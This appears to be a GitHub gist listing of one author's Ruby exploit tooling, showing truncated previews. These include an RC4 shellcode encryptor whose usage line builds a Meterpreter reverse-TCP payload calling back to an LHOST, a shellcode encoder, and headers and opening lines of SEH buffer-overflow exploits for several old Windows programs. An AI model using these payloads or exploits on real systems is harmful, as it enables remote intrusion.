Muhamad Fadzil Ramli mfadzilr

@mfadzilr
mfadzilr / rc4-encrypted_shellcode.rb
Created January 10, 2019 02:03
RC4 Encryption for Shellcode
require 'rc4'
require 'optparse'
options = {}
optparse = OptionParser.new do |opts|
opts.banner = "Usage: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.13.1 -f raw | ruby ./rc5-encrypt.rb --key demo"
options[:key] = nil
opts.on('-k', '--key KEY', 'encryption key') do |key|
options[:key] = key
end

@mfadzilr
mfadzilr / easyfilex.rb
Created January 9, 2016 15:11
Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow (DEP+ASLR Bypass)
#!/usr/bin/env ruby
# encoding: ASCII-8BIT
# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow (DEP+ASLR Bypass)
# Date: Jan 05 2016
# Vulnerability Discovery: ArminCyber
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
# Version: 7.2
# Tested on: Microsoft Windows 7 x86 [Version 6.1.7601]

@mfadzilr
mfadzilr / encoder.rb
Last active May 26, 2018 10:58
Custom shellcode encoder
#!/usr/bin/env ruby
# Custom encoder for ADAMView Exploit
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 09/12/2014
# code is ugly
require 'metasm'
@shellcode = Array.new()

@mfadzilr
mfadzilr / bpftpclient-seh-exploit.rb
Created December 9, 2014 15:17
BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit v2
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass buffer size limitation for bigger payload. Allocate 2nd

@mfadzilr
mfadzilr / advanview-seh.rb
Created December 9, 2014 14:59
Advantech AdamView (.gni) SEH Buffer Overflow
#!/usr/bin/env ruby
# Exploit Title: Advantech AdamView (.gni) SEH Buffer Overflow
# Date: Dec 09 2014
# Vulnerability Discovery: Daniel Kazimirow and Fernando Paez - Core Security
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-179WGW
# Version: 4.30.003
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-8386
# Advisory ID: CORE-2014-0008

@mfadzilr
mfadzilr / bpftpclient-seh.rb
Created December 3, 2014 10:05
BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass stack size limitation for bigger payload. Allocate 2nd

#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]

#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 2.7.3.700 2006.09.29 (.wax) Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: ??
# Software Link: not available
# Version: 2.7.3.700 2006.09.29
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]

@mfadzilr
mfadzilr / freewma-seh-dep-bypass.rb
Created November 12, 2014 08:40
FreeWMA SEH DEP Bypass Exploit
#!/usr/bin/env ruby
# encoding: utf-8
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 01/11/2014
# Tested on windows xp sp 3 (en)
# Free WMA SEH exploit (DEP Bypass)
seh = 4104
stackpivot = 88
buf = "A" * 5000

@mfadzilr
mfadzilr / bin2hex.rb
Last active August 29, 2015 14:08
Binary to hex
#!/usr/bin/env ruby
# Author : Muhamad Fadzil Ramli
# 25/10/2014
# Binary to hexcode
# read bin file
fp = File.open(ARGV[0],"rb")
# read and convert to hex format
def readfile(fp)